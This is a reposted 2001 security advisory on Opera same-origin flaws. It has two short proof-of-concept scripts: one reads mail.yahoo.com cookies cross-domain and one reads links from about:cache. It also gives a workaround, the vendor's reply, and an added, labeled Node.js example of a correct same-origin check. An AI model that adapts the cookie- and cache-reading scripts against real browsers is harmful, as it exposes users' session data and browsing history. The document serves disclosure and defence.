OSEC

From: Steve (stevesecuresolutions.org)
Date: Thu Nov 15 2001 - 17:04:51 CST


    Georgi Guninski security advisory #51, 2001

    Several javascript vulnerabilities in Opera

    Systems affected:
    Opera 5.12/Windows, Opera 5.0/Linux - probably other versions

    Risk: Medium
    Date: 15 November 2001

    Legal Notice:
    This Advisory is Copyright (c) 2001 Georgi Guninski.
    You may distribute it unmodified.
    You may not modify it and distribute it or distribute parts
    of it without the author's written permission.

    Disclaimer:
    The information in this advisory is believed to be true based on
    experiments though it may be false. The opinions expressed in this
    advisory and program are my own and not of any company. The usual
    standard disclaimer applies, especially the fact that Georgi Guninski is
    not liable for any damages caused by direct or indirect use of the
    information or functionality provided by this advisory or program.
    Georgi Guninski bears no responsibility for content or misuse of this
    advisory or program or any derivatives thereof.

    Announcement:
    I am looking for contracts in the security area - check
    http://www.guninski.com

    Description:
    Opera is a multiplatform web browser.
    There are several javascript vulnerabilities in it, basically allowing
    script in a page to access a page and its properties in another domain -
    AFAIK Netscape calls this a "Same Origin Vulnerability".
    It is possible for a script in a web page to access at least the cookies
    and links of arbitrary domains to which the user has access. It is also
    possible for a script to read the links in the user's cache and history,
    which has privacy implications at the least. In some cases cookies and
    links in the cache/history may contain sensitive information such as
    usernames/passwords etc.

    Details:
    Examine the following scripts:
    -1.----------------------------------
    // open a window on a page in another domain and, once it has had time
    // to load, read its cookie from the opener page (should be refused)
    a=window.open("http://mail.yahoo.com");
    function f()
    {
    xx=a.document.cookie;
    alert("hi"+xx);
    // overwrite the foreign document with script that repeats the read from
    // inside that window; "</"+"script>" keeps the HTML parser from ending
    // the outer script element early
    a.document.open();
    a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');setTimeout('z=x.document.cookie;alert(z);',5000)</"+"script>");
    a.document.close();
    }
    setTimeout("f()",5000);
    -----------------------------------

    -2.--------------------------------
    // open Opera's cache listing and read one of the cached URLs from it;
    // the same works against the history listing
    a=window.open("about:cache");
    function f()
    {
    xx=a.document.links[2];
    alert("hi="+xx);
    }
    setTimeout("f()",5000);
    -----------------------------------
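    The reads in scripts 1 and 2 above succeed only because Opera does not
    compare the origin of the opener page with the origin of the opened
    window. The following is an added example, not code from this advisory
    or from Opera: it implements the (scheme, host, port) same-origin
    comparison a browser is expected to apply, models a window.open() result
    whose cookie and links can only be read through that check, and replays
    the two reads. The host names attacker.example and bank.example, the
    cookie value, the link lists and the GuardedWindow class are all
    constructed for the example; about:cache is treated as an opaque origin
    that matches nothing, which is why the cache listing is unreadable from
    any page. It runs under Node.js, which provides the WHATWG URL class.

```javascript
// Added example, not code from the advisory or from Opera: the same-origin
// comparison a browser must apply before script in one window is allowed to
// read another window's document.cookie or document.links. Opera 5.12 let
// the reads in the advisory's scripts 1 and 2 through; this is the check
// that should have refused them. Runs under Node.js (WHATWG URL class).

const DEFAULT_PORTS = { 'http:': '80', 'https:': '443', 'ftp:': '21' };

// Reduce a URL to its origin tuple (scheme, host, port). Non-hierarchical
// schemes such as about: (the advisory's about:cache) have no host; they get
// an opaque origin (null) that matches nothing, not even itself. The URL
// parser lowercases the host name and strips a scheme's default port.
function originOf(urlString) {
  const u = new URL(urlString);
  if (!u.host) return null;
  const port = u.port || DEFAULT_PORTS[u.protocol] || '';
  return { scheme: u.protocol, host: u.hostname, port };
}

// Two URLs share an origin only when all three tuple members are equal.
function sameOrigin(a, b) {
  const oa = originOf(a);
  const ob = originOf(b);
  if (oa === null || ob === null) return false;
  return oa.scheme === ob.scheme && oa.host === ob.host && oa.port === ob.port;
}

// Model of a window returned by window.open(): its cookie and link list
// belong to the opened document, and every read by the opener goes through
// the same-origin gate. The class and all values are constructed for this
// example; the cookie is not real Yahoo data.
class GuardedWindow {
  constructor(url, cookie, links) {
    this.url = url;
    this.cookie = cookie;
    this.links = links;
  }
  // property is 'cookie' or 'links'; openerUrl is the page doing the read
  read(property, openerUrl) {
    if (!sameOrigin(openerUrl, this.url)) {
      return { ok: false,
               reason: `same-origin violation: ${openerUrl} may not read ${property} of ${this.url}` };
    }
    return { ok: true, value: this[property] };
  }
}

// Replays the advisory's two reads with the check in place.
function demo() {
  const mail = new GuardedWindow('http://mail.yahoo.com/',
    'Y=v=1&n=example; T=z=example', ['http://mail.yahoo.com/inbox']);
  const cache = new GuardedWindow('about:cache', '',
    ['http://mail.yahoo.com/', 'http://bank.example/account']);
  const attacker = 'http://attacker.example/evil.html';
  return {
    // script 1: attacker page reads mail.yahoo.com's cookie -> refused
    cookieFromAttacker: mail.read('cookie', attacker),
    // the same read from a page that really is on mail.yahoo.com -> allowed
    cookieFromOwner: mail.read('cookie', 'http://mail.yahoo.com/other'),
    // script 2: attacker page reads the links of about:cache -> refused
    linksFromAttacker: cache.read('links', attacker),
  };
}

for (const [name, r] of Object.entries(demo())) {
  console.log(name + ': ' + (r.ok ? JSON.stringify(r.value) : 'REFUSED (' + r.reason + ')'));
}
```

    Note that the port is part of the tuple: http://mail.yahoo.com:80/ and
    http://mail.yahoo.com/ are the same origin, while https://mail.yahoo.com/
    is a different one even though the host is identical.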

    In addition, the HotJava exploit at
    http://www.guninski.com/hotjava1-desc.html works, as JayInfoAve.net
    pointed out.

    Workaround:
    Disable javascript (Opera suggests enabling "Use cookies to trace
    password protected documents").

    Vendor status:
    The vendor was notified on 5 November 2001 and was asked whether and
    when a fix would be issued. The reply was:
    ------------------------------------
    You should be able to resolve the cookie issue by enabling "Use cookies
    to trace password protected documents", which means that pages with
    password protection aren't cached, cookies aren't stored, the URL
    shouldn't be displayed in History, etc.
    This is a "paranoia" option, and makes a few pages unusable.
    As you are probably aware, many web technologies aren't very secure,
    but it is inconvenient for the user to block these.
    This is why the user should be given a choice to block privacy related
    information.
    ------------------------------------

    Regards,
    Georgi Guninski
    http://www.guninski.com
    ----------------------
    You may visit Guninski Security Mailing List page at
    http://www.guninski.com/mailinglist.html
    ----------------------